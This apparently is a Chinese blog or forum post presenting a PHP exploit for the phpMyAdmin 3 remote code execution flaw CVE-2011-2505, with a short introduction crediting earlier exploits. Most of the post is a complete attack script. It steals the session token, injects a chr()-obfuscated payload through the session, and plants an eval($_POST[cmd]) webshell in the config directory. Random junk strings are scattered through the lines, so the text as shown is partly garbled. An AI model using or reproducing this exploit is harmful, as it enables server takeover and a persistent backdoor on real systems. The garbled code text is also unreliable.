phpadmin3 remote code execute php版本exploit

admin

最近在家做专职奶爸，不谙圈内事很多months了，博客也无更新。
  p1 A0 w8 ]' N
昨夜带孩子整夜未眠，看到黑哥在php security群里关于phpmyadmin3漏洞的讨论，虽然之前没看过漏洞代码，不过前段时间还是在微博上看到wofeiwo的exp了，不过据黑哥说有不鸡肋的利用方法，于是夜里翻代码出来研究了翻，写出了这个冷饭exp，由于我搞的晚了，之前已经很多人研究了写exp了，于是我这个属于炒冷饭，权当研究研究打发时间了。

首先赞下wofeiwo的python版本的exp，再赞下wofeiwo跟superhei的钻研精神，学习的榜样啊。不过之前那个exp利用起来是有一些限制的：
一是session.auto_start = 1；
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
当然还有第三点大家都不可以逾越的鸿沟：config目录存在且可写。
( p7 E& F7 \' k% |
在群里看了黑哥的发言后，再看了下代码，发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。

于是写了这个php版本的exp，代码如下：

3 U3 y% J3 u. t: H9 c8 @( e#!/usr/bin/php
% k. m8 y! ~, H4 c# V% a<?php
print_r('
. p  E, ~0 s6 i) a8 e: @% R  }+---------------------------------------------------------------------------+
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
7 R7 ^/ {! w5 w# wby oldjun(www.oldjun.com)
& q% h# s6 O6 b9 O' X6 \" @- Kwelcome to www.t00ls.net
mail: oldjun@gmail.com
Assigned CVE id: CVE-2011-2505
+---------------------------------------------------------------------------+
1 n! K5 A/ E5 d, u- d');

7 [% w. j9 g- }; f  \( W  R# ^; @& g/**
* working when the directory:"config" exists and is writeable.
5 i0 o# V" c. h8 A1 q8 }7 j**/

- y; p: g1 s, |( u6 P3 ^0 tif ($argc < 3) {
; s2 `2 _2 k1 K" W) V4 b! N    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
; k: W& u! e% F, Phost:      target server (ip/hostname)
path:      path to pma3
3 R' D0 ^7 y& }. I, h$ r0 VExample:
php '.$argv[0].' localhost /pma/
. @3 c# o9 w# ^5 e8 A5 j( Z) D+---------------------------------------------------------------------------+
0 v0 V5 T2 W* H8 ?$ ^');
6 A8 ^4 U' J$ _* n) g  }$ `" o5 X    exit;
}
" {) d# `: L: h. y$ L. L
2 K5 d2 x7 V3 Y. U$host = $argv[1];
/ }- k% Y* ^4 Z; Z! H, @/ X1 |* d. k1 o$path = $argv[2];

/**
* Try to determine if the directory:"config" exists
**/
echo "[+] Try to determine if the directory:config exists....\n";
$returnstr=php_request('config/');
if(strpos($returnstr,'404')){
    exit("[-] Exploit Failed! The directory:config do not exists!\n");
" v0 |, F& P  K, i! [}
* F  j* h/ P; |) \9 w) h
+ a( o/ A: ?! B4 m. t/ U6 m/**
* z+ w2 _7 ]2 D( M7 `+ b5 W * Try to get token and sessionid
" b( D% j5 O; L$ G**/
echo "[+] Try to get token and sessionid....\n";
$result=php_request('index.php');
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
$token=$resp[3];
$sessionid=$resp[1];
5 D( \1 k0 e! dif($token && $sessionid){
    echo "[+] tokentoken\n";
/ W6 Q! d' e% ^# {$ `, Q4 o    echo "[+] Session IDsessionid\n";
8 l  Q2 U( ~; [  ?- q0 ~' _}else{
: p0 j! k# l$ V% b    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
9 f5 w( \' M' u2 s}

/**
/ O- R9 E+ y) k* K( w6 a * Try to insert shell into session
5 T* V6 m0 }) P**/
6 s+ y& l" m1 N$ b" r  \! pecho "[+] Try to insert shell into session....\n";
4 u0 l+ Y# w* Z0 f: q$ K+ a7 u2 g8 Uphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
) q* \# X- M1 m8 K% E# i, x
/**
* Try to create webshell
5 `& R8 y1 v+ H! j. K1 Q**/
' R4 ~) p+ i! {  c9 w) Secho "[+] Try to create webshell....\n";
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
2 Z5 u+ p! @# E/**
* Try to check if the webshell was created successfully
8 N9 U4 S( ^. L. c4 K**/
7 P" }2 o; U1 B. v( Pecho "[+] Try to check if the webshell was created successfully....\n";
$content=php_request('config/config.inc.php');
if(strpos($content,'t00ls')){
    echo "[+] Congratulations! Expoilt successfully....\n";
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
7 ^3 m; N; a$ K6 z# a6 \% n+ I}else{
) @- B, [. v; [5 Z0 M( Y7 N    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
2 S8 a* v( o0 K  F; o. I* N}

function php_request($url,$data='',$cookie=''){
+ R6 Y9 ~3 }+ e# K4 O; A    global  $host, $path;
   
+ w6 M# z! i% p    $method=$data?'POST':'GET';
   
    $packet = $method." ".$path.$url." HTTP/1.1\r\n";
! A5 r. |) H: x: Z4 Q    $packet .= "Accept: */*\r\n";
4 j+ m, a/ F6 `  O3 f$ n    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
6 g1 l- k8 |) S. R8 C- l    $packet .= "Host: $host\r\n";
6 c1 z2 G* r  v4 J- B+ }    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
# i9 X, s9 l+ d6 @    $packet .= $cookie?"Cookie: $cookie\r\n":"";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data?$data:"";

    $fp = fsockopen(gethostbyname($host), 80);
$ k4 Z) C: A4 }5 p" |    if (!$fp) {
    echo 'No response from '.$host; die;
' Y/ R- x" p4 m, H' B2 G$ H    }
/ a, C7 s. N) S$ Y' k1 p6 {: R; a    fputs($fp, $packet);
4 ^2 n4 r, ?2 j- E' J" [
    $resp = '';
$ i2 w; _+ U+ A" e! ~. m, D5 d. v
4 N9 r  j6 `. U6 q. H' Z* t% B/ y    while ($fp && !feof($fp))
' i$ Q+ n1 n8 O+ A4 Y3 i1 ?& a        $resp .= fread($fp, 1024);
5 A& w3 j$ G4 }; t( ~
8 z' O1 V( b0 ^: g& Z! H    return $resp;
}
   
% X+ u4 g, d& k! `' X$ e5 ~: C?>
.